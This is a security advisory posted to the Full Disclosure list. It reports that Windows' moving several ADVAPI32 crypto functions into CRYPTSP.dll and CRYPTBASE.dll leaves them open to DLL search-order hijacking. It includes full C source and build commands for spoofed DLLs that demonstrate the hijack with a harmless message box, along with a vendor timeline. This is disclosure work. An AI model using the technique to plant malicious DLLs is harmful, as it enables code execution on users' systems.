Date: Tue, 15 Dec 2020 22:00:02 +0100
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <fulldisclosure@...lists.org>
Cc: bugtraq@...urityfocus.com
Subject: [FD] Defense in depth -- the Microsoft way (part 68): where
	compatibility means vulnerability

Hi @ll,

this post is a shortened version of
<https://skanthak.homepage.t-online.de/detour.html>

With Windows 2000 and Windows XP, Microsoft introduced the functions
SystemFunction035() alias RtlCheckSignatureInFile(),
SystemFunction036() alias RtlGenRandom(),
SystemFunction040() alias RtlEncryptMemory(), and
SystemFunction041() alias RtlDecryptMemory() in ADVAPI32.dll

Note: RtlCheckSignatureInFile() was never documented, it has the
      following prototype:

| #define RtlCheckSignatureInFile SystemFunction035
|
| __declspec(dllimport)
| BOOL WINAPI RtlCheckSignatureInFile(LPCWSTR Filename);

Note: the import library ADVAPIP.lib shipped with the Windows Driver
      Development Kit provides the stub for SystemFunction035.

<https://msdn.microsoft.com/en-us/library/aa387694.aspx>

<https://msdn.microsoft.com/en-us/library/aa387692.aspx>

<https://msdn.microsoft.com/en-us/library/aa387693.aspx>

| The RtlEncryptMemory function encrypts memory contents.The encrypted
| contents can be decrypted by a subsequent call to the RtlDecryptMemory
| function.
|
| Note  This function has no associated import library. This function
| is available as a resource named SystemFunction040 in Advapi32.dll.
| You must use the LoadLibrary and GetProcAddress functions to dynamically
| link to Advapi32.dll.
|

| Syntax
|
| NTSTATUS RtlEncryptMemory(
|   PVOID Memory,
|   ULONG MemorySize,
|   ULONG OptionFlags)

The statements "This function has no associated import library" are but
wrong: the import library ADVAPI32.lib shipped with the Windows Software
Development Kit for Windows Server 2003 SP1 and later versions provides
stubs for SystemFunction036, SystemFunction040 and SystemFunction041!

Since ADVAPI32.dll is one of the so-called "KnownDLLs", these 4 functions
were safe to use on Windows 2000 and Windows XP and didn't allow DLL
spoofing/hijacking there.

<https://msdn.microsoft.com/en-us/library/ms682586.aspx>

| * If the DLL is on the list of known DLLs for the version of Windows on
|   which the application is running, the system uses its copy of the
|   known DLL (and the known DLL's dependent DLLs, if any) instead of
|   searching for the DLL. For a list of known DLLs on the current system,
|   see the following registry key:
|   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.

With Windows 7, the implementations of these 4 functions were moved to
CRYTPSP.dll and CRYPTBASE.dll respectively: SystemFunction035 is now
forwarded to CRYPTSP.CheckSignatureInFile, while the stubs for
SystemFunction036, SystemFunction040 and SystemFunction041 remaining in
ADVAPI32.dll load CRYPTBASE.dll via LoadLibrary(), retrieve the target
address via GetProcAddress(), call it, and finally unload CRYPTBASE.dll
via FreeLibrary().

With Windows 8.1, the 3 stubs were replaced with forwarders to CRYPTBASE.dll

Since neither CRYPTSP.dll nor CRYPTBASE.dll are "KnownDLLs", this change
made the use of these 4 functions vulnerable to
- CWE-426: Untrusted Search Path
  <https://cwe.mitre.org/data/definitions/426.html>
- CWE-427: Uncontrolled Search Path Element
  <https://cwe.mitre.org/data/definitions/427.html>
- CAPEC-471: Search Order Hijacking
  <https://capec.mitre.org/data/definitions/471.html>

Demonstration
~~~~~~~~~~~~~

1. Save the following sources as CRYPTSP.c and CRYPTBASE.c respectively:

--- CRYPTSP.c ---
#define STRICT
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

#ifndef DLL
#define RtlCheckSignatureInFile SystemFunction035

__declspec(dllimport)
BOOL WINAPI RtlCheckSignatureInFile(LPCWSTR Filename);

__declspec(noreturn)
VOID WINAPI MainCRTStartup(VOID)
{
    ExitProcess(RtlCheckSignatureInFile(L"C:\\Windows\\Explorer.exe") ? ERROR_SUCCESS : GetLastError());
}
#else
extern const IMAGE_DOS_HEADER __ImageBase;

const LPCSTR szReason[4] = {"DLL_PROCESS_DETACH\n",
                            "DLL_PROCESS_ATTACH\n",
                            "DLL_THREAD_ATTACH\n",
                            "DLL_THREAD_DETACH\n"};

BOOL WINAPI _DllMainCRTStartup(HANDLE hModule, DWORD dwReason, LPVOID lpReserved)
{
    LPCSTR           szModule = "<unknown>";
    IMAGE_NT_HEADERS *ntHeader = (IMAGE_NT_HEADERS *) ((LPBYTE) &__ImageBase + __ImageBase.e_lfanew);
    DWORD            dwRVA = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    DWORD            dwSize = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;

    if ((dwRVA != 0UL) && (dwSize >= sizeof(IMAGE_EXPORT_DIRECTORY)))
    {
        dwRVA = ((IMAGE_EXPORT_DIRECTORY *) ((LPBYTE) &__ImageBase + dwRVA))->Name;
        if (dwRVA != 0UL)
            szModule = (LPCSTR) ((LPBYTE) &__ImageBase + dwRVA);
    }

    return IDOK == MessageBoxExA(HWND_DESKTOP,
                                 szReason[dwReason],
                                 szModule,
                                 dwReason == DLL_PROCESS_ATTACH ? MB_OKCANCEL : MB_OK,
                                 MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT));
}

__declspec(dllexport)
BOOL WINAPI CheckSignatureInFile(LPCWSTR Filename)
{
    SetLastError(ERROR_CALL_NOT_IMPLEMENTED);

    return FALSE;
}
#endif // DLL
--- EOF ---

--- CRYPTBASE.c ---
#define STRICT
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

#ifndef LOAD_LIBRARY_SEARCH_SYSTEM32_NO_FORWARDER
#define LOAD_LIBRARY_SEARCH_SYSTEM32_NO_FORWARDER 0x00004000UL
#endif

#ifndef DLL
#define RtlGenRandom SystemFunction036

__declspec(dllimport)
BOOLEAN WINAPI RtlGenRandom(LPVOID Buffer, DWORD Size);

#define RtlEncryptMemory SystemFunction040

__declspec(dllimport)
LONG WINAPI RtlEncryptMemory(LPVOID Memory, DWORD Size, DWORD Flags);

#define RtlDecryptMemory SystemFunction041

__declspec(dllimport)
LONG WINAPI RtlDecryptMemory(LPVOID Memory, DWORD Size, DWORD Flags);

__declspec(noreturn)
VOID WINAPI MainCRTStartup(VOID)
{
    CHAR cbBuffer[32];
    DWORD dwError = ERROR_SUCCESS;

    if (!SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32))
        dwError = GetLastError();

    RtlGenRandom(cbBuffer, sizeof(cbBuffer));
    RtlEncryptMemory(cbBuffer, sizeof(cbBuffer), 0UL);
    RtlDecryptMemory(cbBuffer, sizeof(cbBuffer), 0UL);

    ExitProcess(dwError);
}

#ifndef _WIN64
extern BYTE __safe_se_handler_count;
extern LPVOID __safe_se_handler_table[];

DWORD_PTR __security_cookie = 3141592654UL;

const IMAGE_LOAD_CONFIG_DIRECTORY32 _load_config_used = {sizeof(_load_config_used),
                                                        'DEMO',
                                                         _MSC_VER / 100, _MSC_VER % 100,
                                                         0UL, 0UL, 0UL, 0UL, 0UL, 0UL, 0UL, 0UL, 0UL, 0UL,
                                                         0U,
                                                         LOAD_LIBRARY_SEARCH_SYSTEM32_NO_FORWARDER,
                                                         0UL,
                                                         &__security_cookie,
                                                         __safe_se_handler_table,
                                                         &__safe_se_handler_count,
                                                         0UL, 0UL, 0UL, 0UL, 0UL};
#else
DWORD_PTR __security_cookie = 3141592653589793241ULL >> 16;

const IMAGE_LOAD_CONFIG_DIRECTORY64 _load_config_used = {sizeof(_load_config_used),
                                                         'DEMO',
                                                         _MSC_VER / 100, _MSC_VER % 100,
                                                         0UL, 0UL, 0UL,
                                                         0ULL, 0ULL, 0ULL, 0ULL, 0ULL, 0ULL,
                                                         0UL,
                                                         0U,
                                                         LOAD_LIBRARY_SEARCH_SYSTEM32_NO_FORWARDER,
                                                         0ULL,
                                                         &__security_cookie,
                                                         0ULL, 0ULL, 0ULL, 0ULL, 0ULL, 0ULL,
                                                         0UL};
#endif // _WIN64
#else
#define STATUS_NOT_IMPLEMENTED 0xC0000002L

[...]

BOOLEAN WINAPI SystemFunction036(LPVOID Buffer, DWORD Length)
{
    return FALSE;
}

__declspec(dllexport)
LONG WINAPI SystemFunction040(LPVOID Buffer, DWORD Length, DWORD Flags)
{
    return STATUS_NOT_IMPLEMENTED;
}

__declspec(dllexport)
LONG WINAPI SystemFunction041(LPVOID Buffer, DWORD Length, DWORD Flags)
{
    return STATUS_NOT_IMPLEMENTED;
}
#endif // DLL
--- EOF ---

2. Build CRYPTSP.exe and CRYPTBASE.exe with the following command lines:

   CL.exe /Zl /W4 /Ox /GAF /c CRYPTSP.c
   LINK.exe /DYNAMICBASE /ENTRY:MainCRTStartup /NODEFAULTLIB /NXCOMPAT /RELEASE /SUBSYSTEM:Console CRYPTSP.obj ADVAPIP.lib
KERNEL32.lib
   CL.exe /Zl /W4 /Ox /GAF /c CRYPTBASE.c
   LINK.exe /DEPENDENTLOADFLAG:0x4000 /DYNAMICBASE /ENTRY:MainCRTStartup /NODEFAULTLIB /NXCOMPAT /RELEASE /SUBSYSTEM:CONSOLE
CRYPTBASE.obj ADVAPI32.lib KERNEL32.lib

3. Execute CRYPTSP.exe and CRYPTBASE.exe, then display their exit codes:

   .\CRYPTSP.exe
   ECHO %ERRORLEVEL%
   .\CRYPTBASE.exe
   ECHO %ERRORLEVEL%

   Since C:\Windows\Explorer.exe contains no authenticode signature
   -- its signature is provided in a catalog file -- CRYPTSP.exe returns
   1813 alias ERROR_RESOURCE_TYPE_NOT_FOUND, while CRYPTBASE.exe returns
   0

4. Build CRYPTSP.dll and CRYPTBASE.dll with the following command lines:

   CL.exe /Zl /W4 /Ox /GAF /DDLL /c CRYPTSP.c
   LINK.exe /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /EXPORT:CheckSignatureInFile /NODEFAULTLIB /NXCOMPAT /RELEASE
/SUBSYSTEM:WINDOWS CRYPTSP.obj KERNEL32.lib USER32.lib
   CL.exe /Zl /W4 /Ox /GAF /DDLL /c CRYPTBASE.c
   LINK.exe /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /EXPORT:SystemFunction036 /EXPORT:SystemFunction040
/EXPORT:SystemFunction041 /NODEFAULTLIB /NXCOMPAT /RELEASE /SUBSYSTEM:Windows CRYPTBASE.obj USER32.lib

5. Repeat step 2, and notice the message boxes displayed from CRYPTSP.dll
   and CRYPTBASE.dll

stay tuned, and far away from vulnerable functions of the Windows API
Stefan Kanthak

Timeline:
~~~~~~~~~

2020-11-26    Vulnerability report sent to vendor

2020-11-26    Automated reply

2020-12-03    MSRC case 52299 opened

2020-12-14    MSRC case 52299 closed:
              "We determined your finding does not meet our bar for immediate
               servicing because KnownDlls is a performance--not security--feature."

2020-12-15    Report published